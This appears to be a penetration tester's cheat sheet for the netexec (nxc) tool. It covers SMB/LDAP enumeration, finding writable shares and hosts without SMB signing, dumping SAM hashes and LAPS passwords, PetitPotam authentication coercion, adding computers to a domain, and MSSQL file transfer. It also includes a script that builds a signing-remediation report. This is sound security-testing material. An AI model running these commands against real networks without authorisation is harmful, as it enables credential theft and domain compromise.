# netexec (nxc)

nxc "is a network service exploitation tool that helps automate assessing the security of large networks."

# Basic SMB auth

nxc smb somehost -u user -p 'Winter2027!'

# Basic SMB auth (Kerberos)

I like to get a ticket with getTGT, then run export KRB5CCNAME=user.ccache so nxc can use the ticket cache. Here are some enumeration examples:

Enumerate domain users

nxc ldap domain.com --use-kcache --kdcHost domain.com --users

Connect to host with SMB:

nxc smb SOMECOOLSERVER --use-kcache

# Turn on logging

To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:

log_mode = True

# Change the Pwn3d label

You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:

pwn3d_label = Compromised!

# Find shares

nxc smb pcs.txt -u 'username' -p 'password' --shares

# Filtering shares

If you want to find just READ/WRITE shares for example:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE

Or just WRITE:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE

# Cleaning up share list from log file

If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.

grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt

# Find hosts with/without SMB signing

nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt

# Find hosts with/without SMB signing (alternate way)

Save the output to a file, then grep it for anything where signing is set to false:

nxc smb pcs.txt -u '' -p '' > signingcheck.txt

If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:

cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt
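
A more structured take on the grep/awk above, as an added example (not from the original page or the nxc project): it turns saved output into a hostname-sorted CSV of hosts that do not enforce SMB signing, which is easier to hand over for remediation. It assumes the usual `nxc smb` banner layout, and the function names and sample lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the nxc project). Assumes nxc's usual SMB banner line:
#   SMB <ip> <port> <hostname> [*] <os> (name:..) (domain:..) (signing:..) (SMBv1:..)

# Reads saved `nxc smb` output on stdin and prints one CSV row per host that
# does not enforce signing: hostname,ip,signing,smbv1 (sorted by hostname).
signing_report() {
    esc=$(printf '\033')
    # Drop ANSI colour codes so field 1 is a plain "SMB" even in coloured captures.
    sed "s/${esc}\[[0-9;]*m//g" |
    awk '
        $1 == "SMB" && match($0, /\(signing:[A-Za-z]+\)/) {
            signing = substr($0, RSTART + 9, RLENGTH - 10)   # text after "(signing:"
            smbv1 = "unknown"
            if (match($0, /\(SMBv1:[A-Za-z]+\)/))
                smbv1 = substr($0, RSTART + 7, RLENGTH - 8)  # text after "(SMBv1:"
            if (tolower(signing) == "false")
                print $4 "," $2 "," signing "," smbv1
        }' |
    LC_ALL=C sort -t, -k1,1 -u    # one row per hostname
}

# Constructed sample output (hosts, addresses and builds are made up).
sample_output() {
    cat <<'EOF'
SMB         10.0.0.5        445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain.com) (signing:True) (SMBv1:False)
SMB         10.0.0.21       445    WS07             [*] Windows 10.0 Build 19041 x64 (name:WS07) (domain:domain.com) (signing:False) (SMBv1:False)
SMB         10.0.0.21       445    WS07             [-] domain.com\: STATUS_ACCESS_DENIED
SMB         10.0.0.21       445    WS07             [*] Windows 10.0 Build 19041 x64 (name:WS07) (domain:domain.com) (signing:False) (SMBv1:False)
EOF
    # Same banner shape, captured with colour codes around the protocol column.
    printf '\033[1;34mSMB\033[0m         10.0.0.12       445    FS01             [*] Windows 6.3 Build 9600 x64 (name:FS01) (domain:domain.com) (signing:False) (SMBv1:True)\n'
}

sample_output | signing_report
# Real use: signing_report < signingcheck.txt > no-signing-for-these-folks.csv
```

The SMBv1 column is included because hosts that still offer SMBv1 usually belong on the same hardening ticket as the ones with signing not enforced.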

# Find hosts running WebClient service

nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav

# Find pre-created computer accounts

nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k

# Dump SAM database

nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam

# Coerce authentication

The nxc wiki has an interesting page on the various ways nxc can coerce authentication.

# Coerce via PetitPotam:

nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe

# Add computer to the domain

nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!

# MSSQL commands

Lifted from the nxc wiki

# Execute database commands

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

# Get/put files

Get:

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file.txt /tmp/file

Put:

nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt

# Dump LAPS passwords

Using an account with rights to do so:

nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps